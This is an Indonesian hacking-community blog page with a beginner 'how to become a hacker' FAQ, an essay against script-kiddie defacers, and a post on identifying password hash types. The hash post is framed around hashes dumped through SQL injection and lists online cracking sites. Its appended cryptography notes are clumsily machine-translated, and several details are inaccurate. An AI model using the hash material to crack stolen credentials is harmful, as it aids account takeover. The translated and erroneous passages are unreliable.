0 Move Site

Blog ini telah di Pindahkan ke www.habibnoerq.com

12 Tips Untuk menjadi Hacker bagi Pemula

Bandung-Cyber4rt - Sore Semua nya ,, Nih Berhubung Di Group Bandung-Cyber4rtCrew Ada Yang Minta Dasar Untuk Menjadi Seorang Hacker .. Langsung Aja Ya Kita Mulai ..

Tulisan ini aku buat karena aku menyadari susahnya menjadi newbie , newbie yang
nanya kesana kemari dengan harapan dapet jawaban yang jelas, tetapi malah di
kerjain, di isengin bahkan di boongin, lebih parahnya lagi kalo cuma di ajarin
cara instan, trust me ? bisa deface 1,2, 4, ... 1000 sites tidak menjadikan
kamu hacker !!! pengen terkenal ? yupe kamu berhasil !! (mohon maaf juga , jika
semua yang baca bilang kalo aku munafik,aku akuin kl aku juga pernah mendeface
,but tidak ada kata terlambat untuk menyadarinya )

Stop! jangan salah menyangka dan menuduh kalo aku sudah lebih hebat dari teman2,
dan merasa sok hebat untuk meng-gurui teman2, TIDAK! ini hanyalah apresiasi
terhadap usaha teman-teman yang mau belajar dan terus terang artikel inipun
secaragaris besar meniru artikel "HOW TO BECOME A HACKER" oleh kang "eric S R "
dan telah menyalin ulang beberapa poin penting dari artikel berlicensi GPL tsb.

Artikel inipun telah di bubuhi tambalan2 dari beberapa pertanyaan yang sering
di temui. Adapun yang aku coba lakukan adalah hanya coba mendokumentasikannya
disini dengan harapan jika ada yang memerlukannya dapat dengan mudah me-refer
ke artikel ini.

Soal Version 1.0 , aku sengaja menambahkan versi agar artikel ini tidak baku,
artinya bisa di perbaiki , dihapus, di edit, di sempurnakan sesuai dengan
masukan dari semua teman2 dan perkembangan yang terjadi nantinya .



[F.A.Q]

[0] T : Tolong Jelaskan Apa Itu HAcker ?
J : Hacker adalah: Seseorang yang tertarik untuk mengetahui secara mendalam
mengenai kerja suatu system, komputer, atau jaringan komputer."

[1] T : Maukah Anda mengajari saya cara hacking?
J : Hacking adalah sikap dan kemampuan yang pada dasarnya harus dipelajari sendiri.
Anda akan menyadari bahwa meskipun para hacker sejati bersedia membantu,
mereka tidak akan menghargai Anda jika Anda minta disuapi segala hal yang
mereka ketahui

Pelajari dulu sedikit hal. Tunjukkan bahwa Anda telah berusaha, bahwa Anda
mampu belajar mandiri. Barulah ajukan pertanyaan-pertanyaan spesifik pada
hacker yang Anda jumpai.

Jika toh Anda mengirim email pada seorang hacker untuk meminta nasihat,
ketahuilah dahulu dua hal. Pertama, kami telah menemukan bahwa orang-orang
yang malas dan sembrono dalam menulis biasanya terlalu malas dan sembrono
dalam berpikir sehingga tidak cocok menjadi hacker -- karena itu usahakanlah
mengeja dengan benar, dan gunakan tata bahasa dan tanda baca yang baik,
atau Anda tidak akan diacuhkan.

Kedua, jangan berani-berani meminta agar jawaban dikirim ke alamat email
lain yang berbeda dari alamat tempat Anda mengirim email; kami menemukan
orang-orang ini biasanya pencuri yang memakai account curian, dan kami
tidak berminat menghargai pencuri

T : Kalau begitu arahkan saya?
J : Baiklah , kamu harus belajar !!

T : Apa yang harus di pelajari ?
J : Networking (jaringan) , Programing , Sistem Operasi , Internet

T : wow, apa gak terlalu banyak tuh ?
J : Tidak, Semua itu tidak harus kamu kuasai dalam waktu cepat, basicnya yang penting
Ingat semua itu perlu proses!

T : Networking saya mulai dari mana ?
J : Pengetahuan dasar jaringan ( konsep TCP/IP) , komponen dasar jaringan, topologi
jaringan, terlalu banyak artikel yang dapat kamu baca dan buku yang bertebaran
di toko toko buku, atau kamu bisa mencoba berkunjung kesitus ilmukomputer.com

T : Untuk programing ?
J : Mungkin yang terpenting adalah 'logika' pemrograman , jadi lebih kearah
pemanfaatan logika , ada baiknya belajar algoritma , pengenalan flowchart
atau bagan alur untuk melatih logika (teoritis) serta untuk prakteknya sangat
disarankan belajar pemrograman yang masih menomer satukan logika/murni

T : Kalau begitu bahasa pemrograman apa yang harus saya pelajari awalnya?
J : Bahasa Pemrograman apapun sebenarnya sama baik, tetapi ada baiknya belajar
bahasa seperti C , Perl , Phyton, Pascal, C++ , bukan berarti
menjelek-jelekkan visual programing ( nanti kamu akan tau bedanya )
(*ini murni pengalaman pribadi)

[3] T : Bagaimana saya harus memulai programing ?
J : Kumpulkan semua dokumentasi, manual, how to , FAQ , buku , dan contoh contoh
dari bahasa pemrograman yang akan anda pelajari , Cari dan install software
yang dibutuhkan oleh bahasa tersebut (Sesuai dokumentasi) , cobalah memprogram
walaupun program yang simple, dan kamu tidak di "haramkan" untuk mengetik ulang
program contoh dengan harapan kamu akan lebih mengerti dibandingkan kamu hanya
membaca saja, cari guru, teman atau komunitas yang bisa diajak bekerja sama
dalam mempelajari bahasa tersebut ( gabung dimilis, forum khusus bahasa tsb )
, sisanya tergantung seberapa besar usaha kamu. jangan mudah menyerah apalagi
sampai putus asa.

[1] T : Apakah Visual Basic atau Delphi bahasa permulaan yang bagus?
J : Tidak, karena mereka tidak portabel. Belum ada implementasi open-source dari
bahasa-bahasa ini, jadi Anda akan terkurung di platform yang dipilih oleh vendor.
Menerima situasi monopoli seperti itu bukanlah cara hacker.

[1] T : Apakah matematika saya harus bagus untuk menjadi hacker?
J : Tidak. Meskipun Anda perlu dapat berpikir logis dan mengikuti rantai pemikiran
eksak, hacking hanya menggunakan sedikit sekali matematika formal atau aritmetika.

Anda terutama tidak perlu kalkulus atau analisis (kita serahkan itu kepada para
insinyur elektro :-)). Sejumlah dasar di matematika finit (termasuk aljabar Bool,
teori himpunan hingga, kombinasi, dan teori graph) berguna.

T : Tentang pemrograman Web , apakah harus ?
J : Yupe, dikarenakan Internet adalah dunia kamu nantinya

T : Bahasa pemrograman web apa yang sebaiknya dipelajari untuk pemula ?
J : Mungkin kamu bisa mencoba HTML, dilanjutkan ke PHP yang akan membuat kamu lebih
familiar ke programing secara penuh

T : Tentang Sistem Operasi , kenapa harus ?
J : Penguasaan terhadap suatu operating system adalah sangat penting, kenapa ?
karena itulah lingkungan kamu nantinya , perdalami cara kerja suatu operating
system , kenali dan akrabkan diri :)

T : Sebaiknya, Operating system apa yang saya perdalami?
J : mungkin kamu bisa coba linux atau BSD , selain mereka free , dukungan komunitas
juga sangat banyak sehingga kamu tidak akan di tinggal sendirian jika menemukan
masalah, dan pula kemungkinan kamu untuk dapat berkembang sangatlah besar
dikarenakan sifat "open source"

T : Untuk pemula seperti saya , apa yang harus saya gunakan ?
J : Sebaiknya jika kamu benar benar pemula, kamu bisa gunakan linux , karena baik
sistem installasinya dan Graphical User Interfacenya lebih memudahkan kamu

T : Distro apa yang sebaiknya saya gunakan dan mudah untuk pemula
J : Kamu bisa mencoba Mandrake (disarankan oleh beberapa ahli yang pernah diajak
diskusi) , tetapi kamu bisa memilih sesukamu, meskipun aku memulainya juga
dengan mandrake tetapi aku lebih comfort dengan redhat.

T : Kalau tidak bisa Menginstall linux apakah jalan saya sudah tertutup?
J : Kamu bisa mencoba menginstall vmware , cygwin atau kamu bisa menyewa shell

T : Dimana Saya bisa mendapatkan programn program tersebut
J : berhentilah bertanya , dan arahkan browser kamu ke search engine , terlalu
banyak situs penyedia jasa yang dapat membantu kamu

T : Apakah saya HArus memiliki komputer ?
Y : IYA! , kecuali kalo kamu sudah dapat berinteraksi lebih lama dengan komputer
meskipun itu bukan milik kamu, tetapi sangat baik jika memilikinya sendiri
karena , pertama : Ide yang timbul bisa setiap saat, baik programing, riset
dsb, jadi ada baiknya kamu memilikinya agar dapat langsung
menyalurkan semua ide dan pemikiran kamu
Kedua : menggunakan PC sendiri membuat kamu merasa bebas untuk
bereksplorasi dan mencoba tanpa takut merusak dsb

T : Hardware apa yang saya butuhkan ?
Y : Menginggat harga komputer sudah relatif "murah" (mohon maaf buat yang masih belum
mampu membelinya) , kamu bisa sesuaikan spesifikasinya untuk kamu gunakan

T : Internet , apakah saya harus terkoneksi ke internet?
Y : Terkadang itu perlu, tetapi jangan terlalu memaksakan , kamu memang perlu terhubung
ke internet untuk mendownload modul, bacaan, update informasi, tetapi jangan jadikan
penghalang jika kamu tidak bisa terkoneksi secara periodik, jadilah kreatif


[1] T : Berapa lama waktu yang saya butuhkan?
J : Masalah waktu itu relatif, Bergantung seberapa besar bakat dan usaha Anda.
Kebanyakan orang memperoleh keahlian yang cukup dalam delapan belas bulan
atau dua tahun, jika mereka berkonsentrasi. Tapi jangan pikir setelah itu
selesai; jika Anda hacker sejati, Anda akan menghabiskan sisa waktu belajar
dan menyempurnakan keahlian.

T : Apakah tidak bisa yang Instan ? misal Tinggal gunain tool tertentu ?
J : Hum, kamu mo jadi hacker atau cuma pemakai tools ?, kalau menggunakan tools
semua orang juga bisa!!


[1] T : Bagaimana cara mendapatkan password account orang lain?
J : Ini cracking. Pergi sana, bodoh.

[1] T : Bagaimana cara menembus/membaca/memonitor email orang lain?
J : Ini cracking. Jauh-jauh sana, goblok

[0] T : Cracker ? apa itu ?
J : Cracker adalah individu yang mencoba masuk ke dalam suatu sistem komputer
tanpa ijin (authorisasi), individu ini biasanya berniat jahat/buruk, sebagai
kebalikan dari 'hacker', dan biasanya mencari keuntungan dalam memasuki suatu
sistem

[1] T : Saya dicrack. Maukah Anda menolong saya mencegah serangan berikutnya?
J : Tidak. Setiap kali saya ditanya pertanyaan di atas sejauh ini, ternyata
penanyanya seseorang yang menggunakan Microsoft Windows. Tidak mungkin secara
efektif melindungi sistem Windows dari serangan crack; kode dan arsitektur
Windows terlalu banyak mengandung cacat, sehingga berusaha mengamankan Windows
seperti berusaha menyelamatkan kapal yang bocor dengan saringan. Satu-satunya
cara pencegahan yang andal adalah berpindah ke Linux atau sistem operasi lain
yang setidaknya dirancang untuk keamanan.

T : Apakah saya perlu komunitas ?
J : YUPE , komunitas sangat kamu perlukan, apalagi jika kamu memilih untuk berkecimpung
di dunia opensource, banyak milis yang bisa kamu ikuti, sebaiknya ikuti milis yang
spesifik sesuai dengan yang kamu gunakan. (misal linux, sesuai distro )

T : Apakah termasuk milis sekuriti ?
J : iyah ! cobalah bugtraq@securityfocus.com


Sekian postingan saya kali ini tentang Tips Untuk menjadi Hacker bagi Pemula. Kurang lebihnya saya mohon maaf dan semoga dapat bermanfaat, Wassalam.

SEMOGA BERMANFAAT DAN DITUNGGU KOMENTAR NYA YA ^_^

3 Renungan untuk yg pengen jadi seorang hacker

Bandung-Cyber4rt - Sore Semua nya .. Kali Ini Admin akan Berbagi Artikel Yang mungkin berguna bagi kalian yang ngiler ingin jadi Hacker.
Oke Langsung Aja Kita Mulai Renungannya

Setiap hari exploit demi exploit terus di publikasi di situs² underground para hacker.

Setiap hari selalu aja gw liat satu persatu situs mulai berjatuhan dan halaman index mereka telah berubah secara frontal dengan background rata² berwarna hitam dengan tulisan “Hacked by”.

Mereka yg mulai kenal dengan istilah Hacker mulai mencari berpuluh puluh tutorial di internet tentang cara mendeface situs, mencoba bertanya di milis, forum, hingga bertanya langsung pada sang defacer via chating, dan mereka hanya mendapatkan jawaban “saya bukan hacker kaka”, “Hacker apaan sey omz”, “saya cupu om, ga bisa apa², salah orang situ klo nanya sama saya” yapz… sebuah statement merendahkan diri menaikan mutu dari seorang defacer kacangan yg mengaku hacker...
10 tahun lebih gw terjun di dunia perhackingan, dan melihat scene hacking khususnya di indonesia, apa yg gw liat tentang hacking situs selama ini di lakukan bukan oleh seorang hacker, bahkan seorang cracker, mereka hanya seorang script kiddies yg hanya menyombongkan diri dari hasil deface mereka, dan mereka berbangga dalam hati mereka dan menyebut diri mereka “I am Hacker”....

Kenapa mereka gw sebut rata² script kiddies, bukan… bukan gw meng-claim semua defacer itu seorang script kiddies, ada beberapa dari mereka yg mempunyai skill yg ga main², tapi rata² para cracker baru yg gw liat selama ini hanyalah seorang yg mengaku hacker tapi buta akan programming, ga bisa membuat program, ga ngerti gimana cara mencari exploit itu sendiri, mereka hanya singgah di situs hacker, melihat news bug terbaru, mencari korban melalui search engine, menginjeksi exploit pada url korban, mendapatkan password sang admin web yg masih terenkripsi, lalu meng’cracking password itu pada sebuah situs password cracking tanpa tau cara kerja’a, setelah password asli telah di dekripsi, mereka masuk ke dalam situs korban yg di tuju serta melakukan pengrusakan besar²an dan menyebut diri mereka dengan bangga dalam hati “I am Hacker”.
Perlu lo ketahui, 1000 website yg lo deface dalam satu hari ga akan menjadikan lo seorang hacker, sebuah statement bodoh klo ada seseorang mengklaim diri mereka seorang hacker tapi buta akan programming dan ga bisa membuat program sendiri, sebuah statement bodoh apabila ada seseorang mengklaim diri mereka hacker dan mendeface sebuah situs melalui shell inject tapi mereka ga bisa lepas dari windows dan ga pernah mau apabila di suruh menginstall linux pada hardisk mereka dengan alasan linux/unix itu susah !! what d fuck !! and you claiming yourself a hacker ??

Friend… open your eyes, you’re not a hacker, you just script dumb kiddies, take a look around, seorang hacker tingkat tinggi melakukan deface untuk memberi tau sang admin bahwa ada kelemahan pada situs’a dan mereka berani bertanggung jawab atas perbuatannya.
seorang cracker berbahaya mendeface sebuah situs karena mereka mencari keuntungan materi dari itu semua, dan seorang script kiddies mendeface sebuah situs hanya untuk pamer dan menjadi terkenal tanpa berani bertanggung jawab pada perbuatan mereka.

Cukup buat lo tau aja, seorang hacker dan cracker mampu membuat dan memodifikasi sebuah program, lain hal dengan script kiddies, gada yg bisa di banggain dari mereka, mereka hanya merusak dan merusak tanpa tau gimana cara memperbaiki apa yg mereka rusak, jadi masuk ke dalam kategori yg manakah lo??

Ga adakah rasa malu lo ketika lo bisa membuat sebuah situs hancur dalam sekejap tapi lo ga ngerti ketika seorang bertanya apa itu TCP/IP, bagaimana mengkonfigurasi Firewall, bagiamana cara melihat port yg terbuka, apa perbedaan methode post dan get... See More

Ga adakah rasa malu lo ketika lo mampu membuat situs itu jadi bermasalah dalam waktu yg lama tapi lo ga ngerti cara memfilter syntax SQL yg memungkinkan seorang attacker masuk melalui sql injection, cara patching situs yg terkena masalah remote file inclusion

Ga adakah rasa malu lo ketika lo di sebut hacker oleh orang lain tapi ketika lo di test untuk kerja oleh sebuah perusahaan dan di suruh membuat program dari bahasa pemrograman yg lo kuasai ternyata gada satupun bahasa program yg lo kuasain, dan lo menyebut diri lo hacker? lo salah besar kawan, lo cuma nol besar.

Untuk menjadi seorang defacer sangatlah mudah, ga perlu banyak pengetahuan lebih, tapi untuk menjadi the real hacker bukanlah sebuah hal yg gampang, ketekunan, rasa ingin tau yg sangat besar, membuat, menghadapi dan menyelesaikan masalah bakal membuat lo menjadi seorang hacker yg cukup handal untuk menghadapi hari esok.

so... See More… jadikanlah hidup lo ini lebih berharga, mulai dari sekarang yakinin di hati lo bahwa jangan ada lagi kata main², jangan pernah lagi ngelakuin hal² yg ga jelas dan sia² tanpa ada suatu alasan yg jelas, jangan tunggu besok lagi untuk berubah, karena hari esok belom tentu berpihak buat kita
dan walaupun gw sering melakukan deface terhadap situs² dan mampu membuat program sederhana, tapi gw masih blom pantes untuk menyandang gelar seorang Hacker, masih ada orang yg lebih pantes untuk menyandang gelar itu, dan hingga saat ini gw masih tetap berjuang untuk terus belajar, belajar untuk menemukan sebuah titik cerah dalam hidup, karena gw mengerti bahwa 1 detik dalam hidup sangat berharga dan ga akan pernah bisa terulang lagi.#eof

Sekian postingan saya kali ini tentang Renungan untuk yg pengen jadi seorang hacker. Kurang lebihnya saya mohon maaf dan semoga dapat bermanfaat, Wassalam.

SEMOGA BERMANFAAT DAN DITUNGGU KOMENTAR NYA YA ^_^

2 Tipe-Tipe Hash & Enkripsi

Bandung-Cyber4rt - Sore sobat berikut ini adalah postingan pertama saya di BinusHacker jadi harap maklum kalo tulisan nya jelek dan susah di pahami.
Mungkin teman – teman yang sudah pada jago sql injection pasti pernah kesulitan dalam mengenali tipe hash yg pernah ditemukan ketika melakukan sql injection. Hash erat kaitannya dengan enkripsi. Nah apakah arti hash itu sendiri ? Hash adalah hasil enkripsi dari sebuah password atau informasi yang dianggap penting. Sedangkan Enkripsi adalah proses mengamankan suatu informasi dengan membuat informasi tersebut tidak dapat dibaca tanpa bantuan pengetahuan khusus ( http://id.wikipedia.org/wiki/Enkripsi ).
Pada postingan pertama sya di BinusHacker ini saya akan membahas tipe – tipe hash, semoga postingan saya ini dapat berguna bagi kita semua . Ada beberapa tipe hash diantaranya :
1.MD4 (Message-Digest algortihm 4)
- MD4 dibuat oleh Ronald Rivest pada Oktober 1990, MD4 adalah hash function yang dipakai sebelum MD5, namun karena banyaknya kelemahan MD4 membuatnya diganti oleh MD5.
- panjang 16 bytes (32 karakter)
- contoh : 31d6cfe0d16ae931b73c59d7e0c089c0
2. MD5 (Message-Digest algortihm 5)
- MD5 di desain oleh Ronald Rivest pada tahun 1991 untuk menggantikan hash function sebelumnya, MD4. Pada tahun 1996 (http://id.wikipedia.org/wiki/MD5)
- digunakan di phpBB v2.x, Joomla versi dibawah 1.0.13 dan digunakan oleh beberapa CMS dan forum
- panjangnya 16 bytes (32 karakter)
- contoh : c4ca4238a0b923820dcc509a6f75849b
3. MD5($pass.$salt)
- Digunakan di WB News, Joomla versi 1.0.13 dan versi diatasnya
- panjang 16 bytes (32 karakter)
- hash yang satu ini dimulai dari hashnya duluan kemudian dilanjutkan oleh saltnya
- contoh : 6f04f0d75f6870858bae14ac0b6d9f73
4. MD5($salt.$pass)
- Digunakan di osCommerce, AEF, Gallery dan beberapa CMS lainnya
- panjang 16 bytes (32 karakter)
- hash yang satu ini dimulai dari saltnya duluan kemudian dilanjutkan oleh hashnya
- contoh : f190ce9ac8445d249747cab7be43f7d
5. md5(md5($pass).$salt)
- Digunakan di vBulletin, IceBB dan cms lainnya
- panjang 16 bytes (32 karakter)
- contoh : 6011527690eddca23580955c216b1fd2
6. MD5(WordPress)
- Digunakan di wordpress
- panjangnya 17 bytes (34 karakter)
- hashnya dimulai oleh tanda $P$ kemudian dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah huruf “B”) kemudian dilanjutkan oleh saltnya (8 karakter yg disusun secara acak, dalam contoh ini saltnya adalah “12345678″) lalu dilanjutkan oleh hashnya
- contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01
7. MD5(phpBB3)
- Digunakan di CMS phpBB 3.x.x
- panjangnya 17 bytes (34 karakter)
- hashnya oleh tanda $H$ lalu dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah nomor “9″), kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah “12345678″) kemudian dilanjutkan oleh hashnya
- contoh : $H$9123456785DAERgALpsri.D9z3ht120
8. SHA-1(Secure Hash Algorithm)
- Diciptakan oleh National Institue of Standars and Technology atau U.S. Federal Information Processing Standard digunakan oleh beberapa CMS dan beberapa forum
- panjangnya 20 bytes (40 karakter)
- contoh : 356a192b7913b04c54574d18c28d46e6395428ab
9. SHA-256(Secure Hash Algorithm)
- hashnya dimulai oleh tanda $5$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah “12345678″) lalu dilanjutkan oleh karakter “$” kemudian dilanjutkan oleh hashnya
- panjang 55 karakter
- contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi…
10. SHA-512(Secure Hash Algorithm)
- hashnya dimulai oleh tanda $6$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah “12345678″) lalu dilanjutkan oleh karakter “$” kemudian dilanjutkan oleh hashnya
- panjang 98 karakter
- contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm…
11. Base64
- algoritma yg berfungsi untuk encoding dan decoding suatu data ke dalam format ASCII. panjang maksimal 64 karakter hashnya terdiri dari A..Z, a..z dan 0..9, serta ditambah dengan dua karakter terakhir yang bersimbol yaitu + dan / serta satu buah karakter sama dengan “=”
- digunakan di beberapa forum dan CMS
- contoh : Y3liZXJfY3JpbWluYWw=
Situs untuk mengcrack hash:
http://www.md5decrypter.co.uk/ => decrypt MD5
http://www.md5decrypter.co.uk/sha1-decrypt.aspx => decrypt SHA1
http://base64-encoder-online.waraxe.us/ => decode/encode base64
dan masih banyak lagi
Sumber: http://postinganane.wordpress.com

Penjelasan Lanjutan

1.SHA-1
Dalam kriptografi, SHA-1 adalah sebuah fungsi has kriptografi yang dirancang oleh National Security Agency (NSA) dan diterbitkan oleh NIST sebagai US Federal Information Processing Standard . SHA singkatan dari Secure Hash Algorithm. Tiga SHA algoritma disusun berbeda dan dibedakan sebagai:
  • SHA-0
  • SHA-1
  • SHA-2
HA-1 menghasilkan 160-bit digest dari pesan dengan panjang maksimum (2 64-1) bit. SHA-1 adalah berdasarkan prinsip sama dengan yang digunakan oleh Ronald L. Rivest dari MIT dalam desain MD4 dan MD5 mencerna pesan algoritma, namun memiliki desain yang lebih konservatif.

Spesifikasi asli dari algoritma ini diterbitkan pada tahun 1993 sebagai Secure Hash Standard, FIPS PUB 180 standar lembaga pemerintah, oleh US NIST (Lembaga Nasional Standar dan Teknologi). Versi ini sekarang sering disebut sebagai SHA-0. Itu ditarik oleh NSA lama setelah publikasi dan telah digantikan oleh versi revisi, yang diterbitkan pada tahun 1995 dalam FIPS PUB 180-1 dan umumnya disebut sebagai SHA-1. SHA-1 berbeda dari SHA-0 hanya oleh rotasi bitwise tunggal dalam jadwal pesan yang fungsi kompresi , ini dilakukan, menurut NSA, untuk memperbaiki cacat dalam algoritma asli yang mengurangi keamanan kriptografi nya. Namun, NSA tidak memberikan penjelasan lebih lanjut atau mengidentifikasi cacat yang telah dikoreksi. Kelemahan yang kemudian dilaporkan di kedua-SHA 0 dan SHA-1. SHA-1 tampaknya memberikan resistensi yang lebih besar untuk serangan, mendukung pernyataan bahwa perubahan NSA meningkatkan keamanan.
2. X.509
Dalam kriptografi , X.509 adalah ITU-T standar untuk infrastruktur kunci publik (PKI) untuk single sign-on (SSO) dan Manajemen Privilege Infrastruktur (PMI). X.509 menentukan, antara lain, format standar untuk sertifikat kunci publik , daftar pencabutan sertifikat , atribut sertifikat , dan validasi algoritma jalur sertifikasi .
X.509 awalnya diterbitkan pada tanggal 3 Juli 1988 dan mulai bekerja sama dengan X.500 standar.. Ini mengasumsikan suatu sistem hirarkis yang ketat dari otoritas sertifikat (CA) untuk menerbitkan sertifikat Hal ini bertentangan dengan kepercayaan web model, seperti PGP , dan setiap orang (tidak hanya khusus CA) dapat mendaftar dan dengan demikian membuktikan keabsahan kunci sertifikat ‘orang lain. Versi 3 dari X.509 termasuk fleksibilitas untuk mendukung topologi lainnya seperti jembatan dan jerat ( RFC 4158 ). Hal ini dapat digunakan dalam peer-to-peer, OpenPGP -seperti web kepercayaan , tetapi jarang digunakan dengan cara yang pada tahun 2004. Sistem X.500 belum sepenuhnya dilaksanakan, dan IETF ‘s-Public Key Infrastructure (X.509), atau PKIX, kelompok kerja telah disesuaikan dengan standar organisasi yang lebih fleksibel dari Internet. Bahkan, istilah sertifikat X.509 biasanya mengacu pada IETF’s PKIX Sertifikat dan CRL Profil standar sertifikat X.509 v3, sebagaimana tercantum dalam RFC 5280 , sering disebut sebagai PKIX untuk Public Key Infrastructure (X.509).
Struktur sertifikat
Struktur dari X.509 v3 sertifikat digital adalah sebagai berikut:
  • Sertifikat
  • Versi
  • Nomor seri
  • Algoritma ID
  • Emiten
  • Keabsahan
  • Tidak Sebelum
  • Tidak Setelah
  • Subyek
  • Info Perihal Kunci Publik
  • Algoritma Kunci Publik
  • Subjek Kunci Publik
  • Emiten Unique Identifier (Opsional)
  • Subject Unique Identifier (Opsional)
  • Ekstensi (Opsional)
  • Algoritma Tandatangan Sertifikat
  • Sertifikat Signature
Penerbit dan pengidentifikasi unik subjek diperkenalkan dalam versi 2, Extensions dalam Versi 3. Namun demikian, jumlah Serial harus unik untuk setiap sertifikat yang diterbitkan oleh CA (sebagaimana disebutkan dalam RFC 2459 ).
3. RSA
Dalam kriptografi , RSA (yang berarti Rivest , Shamir dan Adleman yang pertama kali menggambarkannya umum) adalah algoritma untuk kriptografi kunci-publik [1] . Ini merupakan algoritma pertama yang diketahui cocok untuk menandatangani serta enkripsi, dan merupakan salah satu kemajuan besar pertama dalam kriptografi kunci publik. RSA secara luas digunakan dalam perdagangan elektronik protokol, dan diyakini aman diberikan cukup panjang kunci dan penggunaan mutakhir implementasi up.
Operasi
Algoritma RSA melibatkan tiga langkah:
  • Generasi kunci,
  • Enkripsi
  • Dekripsi.
4. Cast-128
Dalam kriptografi , Cast-128 (alternatif CAST5) adalah cipher blok yang digunakan dalam sejumlah produk, terutama sebagai standar cipher dalam beberapa versi GPG dan PGP. Algoritma ini didirikan pada 1996 oleh Carlisle Adams dan Stafford Tavares dengan menggunakan prosedur desain Cast; anggota lain dari keluarga Cast dari cipher, Cast-256 (mantan AES kandidat) diturunkan dari Cast-128. Menurut beberapa sumber, nama Cast berdasarkan inisial dari penemu nya, meskipun Bruce Schneier penulis laporan klaim bahwa “nama harus menyulap gambar acak” (Schneier, 1996).
Cast-128 adalah 12 – atau 16-bulat Feistel jaringan dengan 64 – bit ukuran blok dan ukuran kunci antara 40-128 bit (tapi hanya di-bit bertahap 8). 16 ronde penuh digunakan ketika ukuran kunci lebih panjang dari 80 bit. Komponen termasuk besar 8 × 32-bit kotak S berdasarkan fungsi membungkuk , tergantung pada rotasi kunci, modular penambahan dan pengurangan, dan XOR operasi. Terdapat tiga jenis fungsi bolak bulat, tetapi mereka adalah sama dalam struktur dan berbeda hanya dalam pilihan operasi yang tepat (penambahan, pengurangan atau XOR) pada berbagai titik. Meskipun Penitipan memegang paten pada prosedur desain Cast, Cast-128 tersedia di seluruh dunia pada dasar bebas royalti untuk dan non-komersial menggunakan komersial.
5. Enkripsi ElGamal
Pada kriptografi , sistem enkripsi ElGamal adalah suatu algoritma enkripsi kunci asimetris untuk kriptografi kunci-publik yang didasarkan pada perjanjian-kunci Diffie Hellman . ElGamal enkripsi yang digunakan dalam bebas GNU Privacy Guard perangkat lunak, versi terbaru PGP , dan lainnya algoritma. The Digital Signature Algorithm adalah varian dari skema tanda tangan ElGamal , yang tidak harus bingung dengan enkripsi ElGamal. Enkripsi ElGamal dapat didefinisikan lebih dari setiap grup siklik G. Its keamanan tergantung pada kesulitan masalah tertentu dalam G berhubungan dengan komputasi logaritma diskrit.
Enkripsi ElGamal terdiri dari tiga komponen:
  • Generator kunci
  • Algoritma enkripsi,
  • Algoritma dekripsi.
6. MD5
Dalam kriptografi , MD5 (Message-Digest algorithm 5) banyak digunakan adalah fungsi hash kriptografi dengan 128 – bit nilai hash. Ditentukan dalam RFC 1321 , MD5 telah digunakan dalam berbagai jenis aplikasi keamanan, dan juga sering digunakan untuk memeriksa integritas file . Namun, telah terbukti bahwa MD5 tidak tabrakan tahan ; seperti itu, MD5 tidak cocok untuk aplikasi seperti SSL sertifikat atau signature digital yang bergantung pada properti ini. Sebuah hash MD5 biasanya dinyatakan sebagai 32-digit heksadesimal nomor.
MD5 adalah salah satu dari serangkaian pesan mencerna algoritma didesain oleh Profesor Ronald Rivest dari MIT (Rivest, 1994). Ketika pekerjaan analitik menunjukkan bahwa pendahulu MD5′s MD4 itu mungkin tidak aman, MD5 dirancang pada tahun 1991 untuk menjadi pengganti aman. (Kelemahan memang kemudian ditemukan di MD4 oleh Hans Dobbertin .)
Keamanan fungsi hash MD5 sangat dikompromikan. Sebuah serangan tabrakan ada yang bisa menemukan tabrakan dalam beberapa detik pada komputer biasa (kompleksitas dari 2 24,1). [14] Lebih jauh, ada juga serangan-awalan tabrakan dipilih yang dapat menghasilkan tabrakan dua dipilih berbeda masukan sewenang-wenang, dalam jam komputer reguler tunggal (kompleksitas 2 39).
Algoritma
Proses MD5 pesan variabel-panjang menjadi output tetap-panjang 128 bit. Pesan masukan dipecah menjadi potongan-bit blok 512 (enam belas 32-bit little endian integer); pesan empuk sehingga panjangnya dibagi oleh 512. padding bekerja sebagai berikut: bit tunggal pertama, 1, adalah ditambahkan ke bagian akhir pesan. Ini diikuti oleh sebanyak nol sebagai diwajibkan membawa panjang pesan sampai dengan 64 bit kurang dari kelipatan 512. Bit-bit sisa diisi dengan sebuah integer 64-bit yang mewakili panjang pesan asli, di bit.
Algoritma MD5 utama beroperasi pada kondisi 128-bit, dibagi menjadi empat-bit kata-kata 32, dilambangkan A, B, C dan D. Ini adalah untuk melakukan konstanta tetap tertentu. Algoritma utama kemudian beroperasi pada masing-masing blok pesan 512-bit pada gilirannya, setiap blok memodifikasi negara. Pengolahan blok pesan terdiri dari empat tahap yang sama, disebut putaran, setiap putaran terdiri dari 16 operasi serupa berdasar pada fungsi linear-non F, tambahan modular , dan rotasi ke kiri. Gambar 1 mengilustrasikan satu operasi dalam putaran. Ada empat kemungkinan fungsi F, berbeda yang digunakan dalam setiap putaran:
RC2/40
Dalam kriptografi , RC2 adalah cipher blok yang dirancang oleh Ron Rivest di 1987 . “RC” singkatan dari “Ron’s Code” atau “Rivest Cipher”; cipher lainnya yang dirancang oleh Rivest termasuk RC4 , RC5 dan RC6 .
Pengembangan RC2 disponsori oleh Lotus , yang sedang mencari kebiasaan sandi yang, setelah evaluasi oleh NSA , dapat diekspor sebagai bagian dari Lotus Notes perangkat lunak. NSA menyarankan beberapa perubahan, yang Rivest dimasukkan. Setelah negosiasi lebih lanjut, cipher telah disetujui untuk ekspor di 1989 . Seiring dengan RC4, RC2 dengan 40-bit ukuran kunci dirawat baik di bawah US peraturan ekspor untuk kriptografi .
Awalnya, rincian algoritma dirahasiakan – eksklusif untuk RSA Security – tetapi pada Januari 29 , 1996 , kode sumber untuk RC2 adalah anonim diposting ke Internet pada Usenet forum, sci.crypt . Sebuah pengungkapan yang sama telah terjadi sebelumnya dengan algoritma RC4. Tidak jelas apakah poster itu memiliki akses dengan spesifikasi atau apakah telah reverse engineered .
